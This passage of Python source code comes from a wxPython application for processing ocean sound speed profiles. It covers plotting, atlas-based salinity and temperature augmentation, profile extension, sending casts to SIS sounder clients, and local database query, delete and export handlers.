if self.prj.ssp_data.sis_data is not None:
# Plot thinned SSP for sis
good_pts = (self.prj.ssp_data.sis_data[Dicts.idx['flag'], :] == 0)
self.p.speed_axes.plot(self.prj.ssp_data.sis_data[Dicts.idx['speed'], good_pts],
self.prj.ssp_data.sis_data[Dicts.idx['depth'], good_pts],
marker='o', markersize=2.5, markerfacecolor='#00FF00', fillstyle=u'full',
linestyle='-', color='#33FF33')
if self.prj.has_ssp_loaded and self.p.display_flagged:
# Plot rejected points if desired
bad_pts = (self.prj.ssp_data.data[Dicts.idx['flag'], :] == 1)
self.p.speed_axes.plot(self.prj.ssp_data.data[Dicts.idx['speed'], bad_pts],
self.prj.ssp_data.data[Dicts.idx['depth'], bad_pts], 'r,')
self.p.speed_axes.hold(True)
self.p.temp_axes.plot(self.prj.ssp_data.data[Dicts.idx['temperature'], bad_pts],
self.prj.ssp_data.data[Dicts.idx['depth'], bad_pts], 'r,')
self.p.temp_axes.hold(True)
self.p.sal_axes.plot(self.prj.ssp_data.data[Dicts.idx['salinity'], bad_pts],
self.prj.ssp_data.data[Dicts.idx['depth'], bad_pts], 'r,')
self.p.sal_axes.hold(True)
# Now plot the good points
if self.prj.server.is_running:
line = 'k'
else:
line = 'b'
if self.prj.has_ssp_loaded:
good_pts = (self.prj.ssp_data.data[Dicts.idx['flag'], :] == 0)
self.p.speed_axes.plot(self.prj.ssp_data.data[Dicts.idx['speed'], good_pts],
self.prj.ssp_data.data[Dicts.idx['depth'], good_pts], line)
self.p.temp_axes.plot(self.prj.ssp_data.data[Dicts.idx['temperature'], good_pts],
self.prj.ssp_data.data[Dicts.idx['depth'], good_pts], line)
self.p.sal_axes.plot(self.prj.ssp_data.data[Dicts.idx['salinity'], good_pts],
self.prj.ssp_data.data[Dicts.idx['depth'], good_pts], line)
# Label plots, etc
self.p.speed_axes.grid()
self.p.speed_axes.axis([self.p.min_speed, self.p.max_speed, self.p.min_depth, self.p.max_depth])
self.p.speed_axes.set_xlabel('Sound Speed [m/s]')
self.p.speed_axes.set_ylabel('Depth [m]')
self.p.temp_axes.grid()
self.p.temp_axes.axis([self.p.min_temp, self.p.max_temp, self.p.min_depth,
self.p.max_depth])
self.p.temp_axes.set_xlabel('Temp [deg C]')
self.p.sal_axes.grid()
self.p.sal_axes.axis([self.p.min_sal, self.p.max_sal, self.p.min_depth,
self.p.max_depth])
self.p.sal_axes.set_xlabel('Sal [psu]')
if self.prj.server.is_running:
age_of_transmission = dt.datetime.utcnow() - self.prj.time_of_last_tx
self.p.temp_axes.set_title("SERVER: %d cast(s) delivered\nTime since last transmission: %s"
% (self.prj.server.delivered_casts,
':'.join(str(age_of_transmission).split(':')[:2])))
elif self.prj.has_sippican_to_process or self.prj.has_mvp_to_process:
self.p.temp_axes.set_title("Received %s... please process and deliver to SIS"
% (os.path.basename(self.prj.filename)))
else:
if self.prj.time_of_last_tx:
age_of_transmission = dt.datetime.utcnow() - self.prj.time_of_last_tx
self.p.temp_axes.set_title("%s\nTime since last transmission: %s" % (
os.path.basename(self.prj.filename), ':'.join(str(age_of_transmission).split(':')[:2])))
else:
self.p.temp_axes.set_title("%s" % os.path.basename(self.prj.filename))
# plot the current mean depth (if available and the user setting is on)
# print("# %s %s" % (self.prj.mean_depth, self.p.display_depth))
if self.prj.mean_depth and self.p.display_depth:
# draw line on the 3 plots
line = '#663300'
y = [self.prj.mean_depth, self.prj.mean_depth]
x = [-100.0, 2000] # sound speed
self.p.speed_axes.plot(x, y, line)
x = [-100.0, 100] # temperature
self.p.temp_axes.plot(x, y, line)
x = [-100.0, 100] # salinity
self.p.sal_axes.plot(x, y, line)
# draw rectangle on the 3 plots
if self.prj.server.is_running:
a = 0.8
else:
a = 0.5
sel = matplotlib.patches.Rectangle((-100.0, self.prj.mean_depth), 2100, 12000, edgecolor='k',
facecolor='#996633', label='_nolegend_', alpha=a)
self.p.speed_axes.add_patch(sel)
sel = matplotlib.patches.Rectangle((-100.0, self.prj.mean_depth), 200, 12000, edgecolor='k',
facecolor='#996633', label='_nolegend_', alpha=a)
self.p.temp_axes.add_patch(sel)
sel = matplotlib.patches.Rectangle((-100.0, self.prj.mean_depth), 200, 12000, edgecolor='k',
facecolor='#996633', label='_nolegend_', alpha=a)
self.p.sal_axes.add_patch(sel)
# plot vessel draft and surface sound speed (if available) [only on the speed plot]
# print("@ %s %s" % (self.prj.vessel_draft, self.prj.surface_sound_speed))
if self.prj.vessel_draft and self.prj.surface_sound_speed:
line = 'g--'
# vertical line
x = [self.prj.surface_sound_speed, self.prj.surface_sound_speed]
y = [0.0, 12000]
self.p.speed_axes.plot(x, y, line)
# horizontal line
x = [-100.0, 2100]
y = [self.prj.vessel_draft, self.prj.vessel_draft]
self.p.speed_axes.plot(x, y, line)
# dot at the draft/surface sound speed intersection
self.p.speed_axes.plot(self.prj.surface_sound_speed, self.prj.vessel_draft, 'g+', mew=1.6, ms=6)
# plotting during point insertion
if self.p.sel_mode == self.p.sel_modes["Insert"]:
salinities = np.zeros(2)
temperatures = np.zeros(2)
depths = np.zeros(2)
depths[0] = self.prj.u.user_depth
pts = ((self.prj.ssp_data.data[Dicts.idx['flag'], :] == 0)
& (self.prj.ssp_data.data[Dicts.idx['depth'], :] < self.prj.u.user_depth))
if np.count_nonzero(pts) > 0:
depths[1] = self.prj.ssp_data.data[Dicts.idx['depth'], pts][-1]
temperatures[1] = self.prj.ssp_data.data[Dicts.idx['temperature'], pts][-1]
salinities[1] = self.prj.ssp_data.data[Dicts.idx['salinity'], pts][-1]
if self.prj.u.user_salinity:
salinities[0] = self.prj.u.user_salinity
self.p.sal_axes.plot(salinities, depths, "c--")
if self.prj.u.user_temperature:
temperatures[0] = self.prj.u.user_temperature
self.p.temp_axes.plot(temperatures, depths, "c--")
pts = ((self.prj.ssp_data.data[Dicts.idx['flag'], :] == 0)
& (self.prj.ssp_data.data[Dicts.idx['depth'], :] > self.prj.u.user_depth))
if np.count_nonzero(pts) > 0:
depths[1] = self.prj.ssp_data.data[Dicts.idx['depth'], pts][0]
temperatures[1] = self.prj.ssp_data.data[Dicts.idx['temperature'], pts][0]
salinities[1] = self.prj.ssp_data.data[Dicts.idx['salinity'], pts][0]
if self.prj.u.user_salinity:
salinities[0] = self.prj.u.user_salinity
self.p.sal_axes.plot(salinities, depths, "c--")
if self.prj.u.user_temperature:
temperatures[0] = self.prj.u.user_temperature
self.p.temp_axes.plot(temperatures, depths, "c--")
if self.prj.u.user_salinity:
self.p.sal_axes.plot(self.prj.u.user_salinity, self.prj.u.user_depth, "c.")
if self.prj.u.user_temperature:
self.p.temp_axes.plot(self.prj.u.user_temperature, self.prj.u.user_depth, "c.")
self.p.plots.draw()
# ###### Process #####
def on_process_load_salinity(self, evt):
"""XBT-specific function to add salinity values"""
if self.prj.ssp_data.sensor_type != Dicts.sensor_types["XBT"]:
msg = 'This is a XBT-specific function!'
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if self.prj.ssp_reference:
log.info("using reference cast to augment salinity")
self.prj.ssp_data.replace_samples(self.prj.ssp_reference, 'salinity')
salinity_source = 'user-specified reference file %s' % self.prj.ssp_reference_filename
else: # atlases
if self.prj.s.ssp_salinity_source == Dicts.salinity_sources["RTOFS"]:
# ext_type = Dicts.source_types['RtofsExtend']
salinity_source = "RTOFS"
if not self.prj.rtofs_atlas_loaded:
if self.prj.woa09_atlas_loaded: # try with WOA09
log.info("RTOFS grids not loaded, reverting to WOA09")
# ext_type = Dicts.source_types['Woa09Extend']
salinity_source = "WOA09"
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'salinity')
else:
msg = "Functionality disabled: Failed on load RTOFS and WOA09 grids"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
else:
try:
temp_sv = self.prj.rtofs_atlas.query(self.prj.ssp_data.latitude,
self.prj.ssp_data.longitude,
self.prj.ssp_data.date_time)
self.prj.ssp_data.replace_samples(temp_sv, 'salinity')
except SspError:
if self.prj.woa09_atlas_loaded: # try with WOA09
log.info("failure in RTOFS lookup, reverting to WOA09")
# ext_type = Dicts.source_types['Woa09Extend']
salinity_source = "WOA09"
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'salinity')
else:
msg = "Functionality disabled: Failed on load RTOFS and WOA09 grids"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
elif self.prj.s.ssp_salinity_source == Dicts.salinity_sources["WOA09"]:
# ext_type = Dicts.source_types['Woa09Extend']
salinity_source = "WOA09"
if not self.prj.woa09_atlas_loaded:
msg = "Functionality disabled: failure in loading WOA09 atlas"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if self.prj.ssp_woa is None:
msg = "Functionality disabled: failure in WOA2009 lookup"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
# And then extend by WOA
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'salinity')
else:
raise SspError("unsupported extension source: %s" % self.prj.s.ssp_extension_source)
# Now replace the salinity values in the cast with the salinity values in WOA
self.prj.ssp_data.calc_speed()
# add metadata to source info
self.prj.ssp_data.modify_source_info("salinity augmented from %s" % salinity_source)
self._update_plot()
msg = 'Salinity added to profile using source %s' % salinity_source
log.info(msg)
self.status_message = 'Salinity added from %s' % salinity_source
def on_process_load_temp_and_sal(self, evt):
"""XSV- and SVP- specific function"""
if (self.prj.ssp_data.sensor_type != Dicts.sensor_types["XSV"]) \
and (self.prj.ssp_data.sensor_type != Dicts.sensor_types["SVP"]):
msg = 'XSV- and SVP-specific function!'
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if self.prj.ssp_reference:
log.info("using reference cast to augment salinity and temperature")
self.prj.ssp_data.replace_samples(self.prj.ssp_reference, 'salinity')
self.prj.ssp_data.replace_samples(self.prj.ssp_reference, 'temperature')
temperature_salinity_source = 'user specified reference file %s' % self.prj.ssp_reference_filename
else: # atlases
if self.prj.s.ssp_salinity_source == Dicts.salinity_sources["RTOFS"]:
# ext_type = Dicts.source_types['RtofsExtend']
temperature_salinity_source = "RTOFS"
if not self.prj.rtofs_atlas_loaded:
if self.prj.woa09_atlas_loaded: # try with WOA09
log.info("RTOFS grids not loaded, reverting to WOA09")
# ext_type = Dicts.source_types['Woa09Extend']
temperature_salinity_source = "WOA09"
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'salinity')
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'temperature')
else:
msg = "Functionality disabled: Failed on load RTOFS and WOA09 grids"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
else:
try:
temp_sv = self.prj.rtofs_atlas.query(self.prj.ssp_data.latitude,
self.prj.ssp_data.longitude,
self.prj.ssp_data.date_time)
self.prj.ssp_data.replace_samples(temp_sv, 'salinity')
self.prj.ssp_data.replace_samples(temp_sv, 'temperature')
except SspError:
if self.prj.woa09_atlas_loaded: # try with WOA09
log.info("failure in RTOFS lookup, reverting to WOA09")
# ext_type = Dicts.source_types['Woa09Extend']
temperature_salinity_source = "WOA09"
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'salinity')
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'temperature')
else:
msg = "Functionality disabled: Failed on load RTOFS and WOA09 grids"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
elif self.prj.s.ssp_salinity_source == Dicts.salinity_sources["WOA09"]:
# ext_type = Dicts.source_types['Woa09Extend']
temperature_salinity_source = "WOA09"
if not self.prj.woa09_atlas_loaded:
msg = "Functionality disabled: failure in loading WOA09 atlas"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if self.prj.ssp_woa is None:
msg = "Functionality disabled: failure in WOA2009 lookup"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
# And then extend by WOA
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'salinity')
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'temperature')
else:
raise SspError("unsupported extension source: %s" % self.prj.s.ssp_extension_source)
# add metadata to source info
self.prj.ssp_data.modify_source_info("temperature/salinity augmented from %s" % temperature_salinity_source)
# We don't recalculate speed, of course. T/S is simply for absorption coefficient calculation
self._update_plot()
msg = 'Temperature/Salinity added to profile using source %s' % temperature_salinity_source
log.info(msg)
self.status_message = "Temperature/salinity added from %s" % temperature_salinity_source
def on_process_load_surface_ssp(self, evt):
if self.prj.km_listener.xyz88:
surface_ssp = np.mean(self.prj.km_listener.xyz88.sound_speed)
surface_ssp_source = "depth datagram"
else:
dlg = wx.TextEntryDialog(None,
'No surface sound speed received on port 16103.\nPlease enter surface sound speed',
'Text Entry')
if dlg.ShowModal() == wx.ID_CANCEL:
dlg.Destroy()
return
dlg.Destroy()
surface_ssp = float(dlg.GetValue())
surface_ssp_source = "manual entry"
if not self.prj.vessel_draft:
self.get_transducer_draft()
if not self.prj.vessel_draft:
return
# Insert the surface speed value into the profile at the vessel_draft
self.prj.surface_speed_applied = True
self.prj.ssp_applied_depth = 1.15 * self.prj.vessel_draft
self.prj.ssp_data.insert_sample(depth=self.prj.ssp_applied_depth, speed=surface_ssp,
temperature=None, salinity=None,
source=Dicts.source_types['SurfaceSensor'])
# And set all values shoaller than the draft to be the same speed
idx = self.prj.ssp_data.data[Dicts.idx['depth'], :] < self.prj.ssp_applied_depth
self.prj.ssp_data.data[Dicts.idx['speed'], idx] = surface_ssp
self.prj.ssp_data.modify_source_info('surface sound speed from %s' % surface_ssp_source)
self._update_plot()
msg = 'Surface sound speed %.2f added to profile for upper %.1f m (source: %s)' \
% (surface_ssp, self.prj.vessel_draft, surface_ssp_source)
log.info(msg)
self.status_message = "Added surface sound speed %.1f" % surface_ssp
def on_process_extend(self, evt):
if self.prj.has_ssp_loaded is None:
log.info("no ssp to extend")
return
if self.prj.ssp_reference:
log.info("Extending with user-specified reference profile")
ext_type = Dicts.source_types['UserRefExtend']
self.prj.ssp_data.extend(self.prj.ssp_reference, ext_type)
else: # atlases
if self.prj.s.ssp_extension_source == Dicts.extension_sources["RTOFS"]:
ext_type = Dicts.source_types['RtofsExtend']
if not self.prj.rtofs_atlas_loaded:
if self.prj.woa09_atlas_loaded: # try with WOA09
log.info("RTOFS grids not loaded, reverting to WOA09")
ext_type = Dicts.source_types['Woa09Extend']
self.prj.ssp_data.extend(self.prj.ssp_woa, ext_type)
else:
msg = "Functionality disabled: Failed on load RTOFS and WOA09 grids"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
else:
try:
temp_sv = self.prj.rtofs_atlas.query(self.prj.ssp_data.latitude,
self.prj.ssp_data.longitude,
self.prj.ssp_data.date_time)
self.prj.ssp_data.extend(temp_sv, ext_type)
# now use the WOA09 since it usually goes deeper
self.prj.ssp_data.extend(temp_sv, Dicts.source_types['Woa09Extend'])
except SspError:
if self.prj.woa09_atlas_loaded: # try with WOA09
log.info("failure in RTOFS lookup, reverting to WOA09")
ext_type = Dicts.source_types['Woa09Extend']
self.prj.ssp_data.extend(self.prj.ssp_woa, ext_type)
else:
msg = "Functionality disabled: Failed on load RTOFS and WOA09 grids"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
elif self.prj.s.ssp_extension_source == Dicts.extension_sources["WOA09"]:
ext_type = Dicts.source_types['Woa09Extend']
if not self.prj.woa09_atlas_loaded:
msg = "Functionality disabled: failure in loading WOA09 atlas"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if self.prj.ssp_woa is None:
msg = "Functionality disabled: failure in WOA2009 lookup"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
# And then extend by WOA
self.prj.ssp_data.extend(self.prj.ssp_woa, ext_type)
else:
raise SspError("unsupported extension source: %s" % self.prj.s.ssp_extension_source)
self._update_plot()
msg = 'Profile extended to depth %d m using source type %s' \
% (self.prj.ssp_data.data[Dicts.idx['depth'], self.prj.ssp_data.data.shape[1] - 1], ext_type)
log.info(msg)
self.prj.ssp_data.modify_source_info("extension type %s" % ext_type)
self.status_message = 'Profile extended using source type %s' % ext_type
def on_process_preview_thinning(self, event):
log.info("preview thinning")
self.prj.ssp_data.prepare_sis_data(thin=True)
self._update_plot()
log.info('Preview the thinning step required by some client types')
self.status_message = 'Preview thinning'
def on_process_send_profile(self, evt):
if self.prj.s.auto_export_on_send and self.prj.count_export_formats() == 0:
msg = "The selected 'auto-export' option requires selection of export formats from Export sub-menu.\n" \
"Send anyway or cancel?"
dlg = wx.MessageDialog(None, msg, "Auto-export option", wx.OK | wx.CANCEL | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_CANCEL:
return
if not self.prj.ssp_recipient_ip:
dlg = wx.TextEntryDialog(None, 'Enter Remote IP address', 'Text Entry')
if dlg.ShowModal() == wx.ID_CANCEL:
dlg.Destroy()
return
dlg.Destroy()
try:
# inet_pton supports IPV6
socket.inet_aton(dlg.GetValue())
except socket.error:
dlg = wx.MessageDialog(None, "Error: Invalid IP address", "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal() # Show it
dlg.Destroy()
return
self.prj.ssp_recipient_ip = dlg.GetValue()
dlg.Destroy()
if self.ref_monitor:
self.ref_monitor.pause_corrections()
corrector = self.ref_monitor.get_corrector()
depth = self.ref_monitor.get_mean_depth()
# Only if the server is not running
if corrector != 0.0:
msg = "Do you really want to apply the corrector calculated with the Refraction Monitor?\n" \
"This will manipulate the SSP (corrector: %.1f, depth: %.1f)" \
% (corrector, depth)
dlg = wx.MessageDialog(None, msg, "Warning", wx.OK | wx.CANCEL | wx.ICON_QUESTION)
result = dlg.ShowModal()
if result == wx.ID_CANCEL:
corrector = 0.0
dlg.Destroy()
if corrector != 0.0:
log.info("applying corrector: %s %s" % (corrector, depth))
if self.prj.surface_speed_applied:
idx = self.prj.ssp_data.data[Dicts.idx['depth'], :] > self.prj.ssp_applied_depth
self.prj.ssp_data.data[Dicts.idx['speed'], idx] = \
self.prj.ssp_data.data[Dicts.idx['speed'], idx] + corrector
else:
self.prj.ssp_data.data[Dicts.idx['speed'], :] = \
self.prj.ssp_data.data[Dicts.idx['speed'], :] + corrector
self.ref_monitor.set_corrector(0)
# loop through client list
success = True
fmt = None
for client in range(self.prj.s.client_list.num_clients):
if self.prj.s.sis_auto_apply_manual_casts:
fmt = Dicts.kng_formats['S01']
else:
fmt = Dicts.kng_formats['S12']
msg = "Transmitting cast to %s" % self.prj.s.client_list.clients[client].IP
log.info(msg)
self.status_message = msg
self._update_status()
success = self.prj.send_cast(self.prj.s.client_list.clients[client], fmt)
if self.prj.s.sis_auto_apply_manual_casts:
if success:
if self.prj.s.client_list.clients[client].protocol == "SIS":
log.info("Reception confirmed from " + self.prj.s.client_list.clients[client].IP)
self.status_message = "Reception confirmed!"
msg = "SIS confirmed the SSP reception!"
dlg = wx.MessageDialog(None, msg, "SIS acknowledge", wx.OK)
dlg.ShowModal()
dlg.Destroy()
if self.prj.has_sippican_to_process:
self.prj.has_sippican_to_process = False
if self.prj.has_mvp_to_process:
self.prj.has_mvp_to_process = False
else:
self.status_message = "Transmitted cast, confirm reception in %s" % (
self.prj.s.client_list.clients[client].protocol)
else:
msg = "Cannot confirm reception of profile for client %s, please check SIS:\n" % (
self.prj.s.client_list.clients[client].IP)
msg += "1) Check sound speed file name in SIS run-time parameters " \
"and match date/time in SIS .asvp filename with cast date/time to ensure receipt\n"
msg += "2) Ensure SVP datagram is being distributed to this IP " \
"on port %d to enable future confirmations" % self.prj.s.km_listen_port
log.info(msg)
dlg = wx.MessageDialog(None, msg, "Acknowledge", wx.OK | wx.ICON_ERROR)
dlg.ShowModal() # Show it
dlg.Destroy()
if not self.prj.s.sis_auto_apply_manual_casts:
msg = "Profile transmitted, SIS is waiting for operator confirmation."
log.info(msg)
dlg = wx.MessageDialog(None, msg, "Acknowledge", wx.OK)
dlg.ShowModal() # Show it
dlg.Destroy()
msg = "Transmitted Data: %s" % self.prj.ssp_data.convert_km(fmt)
log.info(msg)
# Now that we're done sending to clients, auto-export files if desired
if self.prj.s.auto_export_on_send:
self.prj.formats_export("USER")
if success:
self.prj.time_of_last_tx = dt.datetime.utcnow()
else:
self.prj.time_of_last_tx = None
self._update_plot()
if self.ref_monitor:
self.ref_monitor.resume_corrections()
if self.prj.has_sippican_to_process or self.prj.has_mvp_to_process:
# If we had received a sippican cast over UDP
# then update the display to remove the RED background
self.prj.has_sippican_to_process = False
self.prj.has_mvp_to_process = False
self._update_plot()
def on_process_store_db(self, event):
log.info("store current SSP:\n%s" % self.prj.ssp_data)
# create a collection with only the current cast
ssp_coll = SspCollection()
ssp_coll.append(self.prj.ssp_data)
# add the created collection to the local db
ssp_db = SspDb()
ssp_db.add_casts(ssp_coll)
ssp_db.disconnect()
def on_process_redo_processing(self, event):
msg = "Do you really want to reload the stored raw data?\n" \
"This implies to lose all the applied processing actions!"
dlg = wx.MessageDialog(None, msg, "Restart processing", wx.YES | wx.NO | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_NO:
return
log.info("restart processing")
self.prj.ssp_data.restart_processing()
self._update_plot()
log.info('Restart processing using stored raw data')
self.status_message = 'Restart processing'
def on_process_log_metadata(self, evt):
"""Activate the logging of the processing metadata"""
flag = self.ProcessLogMetadata.IsChecked()
# to be able to log the first and the last message
if flag:
self.prj.activate_logging_on_db()
else:
self.prj.deactivate_logging_on_db()
# def on_process_express_mode(self, evt):
# """DISABLED SINCE USERS TEND TO MISUSE THIS FUNCTIONALITY"""
# msg = "Are you sure you want to do express processing?\nThis will deliver the profile to the sounder."
# dlg = wx.MessageDialog(None, msg, "Question", wx.OK | wx.CANCEL | wx.ICON_QUESTION)
# result = dlg.ShowModal()
# dlg.Destroy()
# if result == wx.ID_CANCEL:
# return
# if self.prj.ssp_data.sensor_type == Dict.sensor_types["XBT"]:
# self.on_process_load_salinity(evt)
# elif self.prj.ssp_data.sensor_type == "XSV" or self.prj.ssp_data.sensor_type == "SVP":
# self.on_process_load_temp_and_sal(evt)
# self.on_process_load_surface_ssp(evt)
# self.on_process_extend(evt)
# self.on_process_send_profile(evt)
# ####### Database ######
def on_db_query_internal_db(self, event):
log.info("query internal db")
self._query_db()
def on_db_query_external_db(self, event):
log.info("query external db")
# retrieve the name of the format
selection_filter = "DB files (*.db,*.DB)|*.db;*.DB|All File (*.*)|*.*"
dlg = wx.FileDialog(self, "External DB Selection", "", "", selection_filter,
style=wx.FD_OPEN | wx.FD_CHANGE_DIR)
if dlg.ShowModal() != wx.ID_OK:
dlg.Destroy()
return
db_directory = dlg.GetDirectory()
db_file = dlg.GetFilename()
dlg.Destroy()
db_path = os.path.join(db_directory, db_file)
self._query_db(db_path)
def _query_db(self, db_path=None):
"""Query and load SSP from a DB (both internal and extenal)"""
try:
if db_path is None:
ssp_db = SspDb()
else:
ssp_db = SspDb(db_path=db_path)
except HyOError as e:
msg = '%s' % e
dlg = wx.MessageDialog(None, msg, "Local DB", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
pk_list = ssp_db.list_all_ssp_pks()
# print(pk_list)
if len(pk_list) == 0:
msg = 'The DB is empty. Load and store an SSP first!'
dlg = wx.MessageDialog(None, msg, "Local DB", wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
ssp_db.disconnect()
return
if self.prj.has_ssp_loaded:
self.prj.clean_project()
self.clear_app()
dlg_list = [("%04d: %s @ %s [%s]" % (tp[0], tp[1], tp[2], Dicts.first_match(Dicts.sensor_types, int(tp[4]))))
for tp in pk_list]
# print(dlg_list)
dialog = wx.SingleChoiceDialog(None, "Pick a stored SSP", "Local DB", dlg_list)
selection = dialog.ShowModal()
dialog.Destroy()
if selection != wx.ID_OK:
ssp_db.disconnect()
return
# actually loading the data
self.prj.ssp_data = ssp_db.get_ssp_by_pk(pk_list[dialog.GetSelection()][0])
self.prj.filename = "%s_LocalDB" % self.prj.ssp_data.original_path
self.prj.u.filename_prefix = os.path.splitext(self.prj.filename)[0]
self.prj.ssp_woa, self.prj.ssp_woa_min, self.prj.ssp_woa_max = \
self.prj.woa09_atlas.query(self.prj.ssp_data.latitude, self.prj.ssp_data.longitude,
self.prj.ssp_data.date_time)
if self.prj.ssp_woa is not None:
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'salinity')
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'temperature')
self.prj.has_ssp_loaded = True
self.prj.surface_speed_applied = False
self.prj.ssp_applied_depth = 0
self._update_plot()
self._update_state(self.gui_state['OPEN'])
self.status_message = "Loaded SSP from local DB"
log.info("Loaded selected SSP: %s [%s]\n" % (dialog.GetSelection(), dialog.GetStringSelection()))
ssp_db.disconnect()
# Delete
def on_db_delete_internal(self, event):
log.info("deletion from internal db")
self._delete_db_ssp()
def on_db_delete_external(self, event):
log.info("deletion from external db")
# retrieve the name of the format
selection_filter = "DB files (*.db,*.DB)|*.db;*.DB|All File (*.*)|*.*"
dlg = wx.FileDialog(self, "External DB Selection", "", "", selection_filter,
style=wx.FD_OPEN | wx.FD_CHANGE_DIR)
if dlg.ShowModal() != wx.ID_OK:
dlg.Destroy()
return
db_directory = dlg.GetDirectory()
db_file = dlg.GetFilename()
dlg.Destroy()
db_path = os.path.join(db_directory, db_file)
self._query_db(db_path)
def _delete_db_ssp(self, db_path=None):
"""Delete SSP entries from a DB (both internal and extenal)"""
try:
if db_path is None:
ssp_db = SspDb()
else:
ssp_db = SspDb(db_path=db_path)
except HyOError as e:
msg = '%s' % e
dlg = wx.MessageDialog(None, msg, "Local DB", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
pk_list = ssp_db.list_all_ssp_pks()
# print(pk_list)
if len(pk_list) == 0:
msg = 'The DB is empty. Nothing to delete!'
dlg = wx.MessageDialog(None, msg, "Local DB", wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
ssp_db.disconnect()
return
if self.prj.has_ssp_loaded:
self.prj.clean_project()
self.clear_app()
dlg_list = [("%04d: %s @ %s [%s]" % (tp[0], tp[1], tp[2], Dicts.first_match(Dicts.sensor_types, int(tp[4]))))
for tp in pk_list]
# print(dlg_list)
dialog = wx.SingleChoiceDialog(None, "Pick a stored SSP", "Local DB", dlg_list)
selection = dialog.ShowModal()
dialog.Destroy()
if selection != wx.ID_OK:
ssp_db.disconnect()
return
# actually do the deletion
try:
ssp_db.delete_ssp_by_pk(pk_list[dialog.GetSelection()][0])
except HyOError as e:
msg = '%s' % e
dlg = wx.MessageDialog(None, msg, "Local DB", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
# Export
def on_db_export_shp(self, event):
log.info("exporting as shapefile")
self._db_export(GdalAux.ogr_formats[b'ESRI Shapefile'])
def on_db_export_kml(self, event):
log.info("exporting as kml")
self._db_export(GdalAux.ogr_formats[b'KML'])
def on_db_export_csv(self, event):
log.info("exporting as csv")
self._db_export(GdalAux.ogr_formats[b'CSV'])
@classmethod
def _db_export(cls, ogr_format):
ssp_db = SspDb()
try:
ssp_db.convert_ssp_view_to_ogr(ogr_format)
except HyOError as e:
msg = '%s' % e
dlg = wx.MessageDialog(None, msg, "Local DB", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
Helper.explore_folder(ssp_db.export_folder)
# Plot
def on_db_plot_map_ssp(self, event):
log.info("plot a map with all SSPs")
ssp_db = SspDb()
ssp_db.map_ssp_view()
def on_db_plot_daily_ssp(self, event):
log.info("plot daily SSPs")
ssp_db = SspDb()
ssp_db.create_daily_plots(save_fig=False)
def on_db_save_daily_ssp(self, event):
log.info("save daily SSPs")
ssp_db = SspDb()
ssp_db.create_daily_plots(save_fig=True)
Helper.explore_folder(ssp_db.plots_folder)
# ####### Tools ######
def on_tools_geo_monitor(self, evt):
"""Display a map with the profile position"""
if not self.geo_monitor:
log.info("geo monitor not available")
return
# Request the current SVP cast from the clients prior. Take the first one that comes through.
self.prj.km_listener.ssp = None
for client in range(self.prj.s.client_list.num_clients):
log.info("Testing client %s for position ..." % self.prj.s.client_list.clients[client].IP)
self.prj.ssp_recipient_ip = self.prj.s.client_list.clients[client].IP
self.prj.get_cast_from_sis()
if self.prj.km_listener.ssp:
log.info("... got SSP > valid client")
break
else:
log.info("... not valid SSP > skip this client")
if not self.prj.km_listener.ssp:
msg = "Unable to run the geo-monitor since no casts were retrieved from SIS clients"
dlg = wx.MessageDialog(None, msg, "Clients issue", wx.OK | wx.ICON_ERROR)
dlg.ShowModal() # Show it
dlg.Destroy()
return
self.geo_monitor.OnShow()
def on_tools_refraction_monitor(self, evt):
"""Display a refraction monitor"""
if not self.ref_monitor:
log.info("refraction monitor not available")
return
# Request the current SVP cast from the clients prior. Take the first one that comes through.
self.prj.km_listener.ssp = None
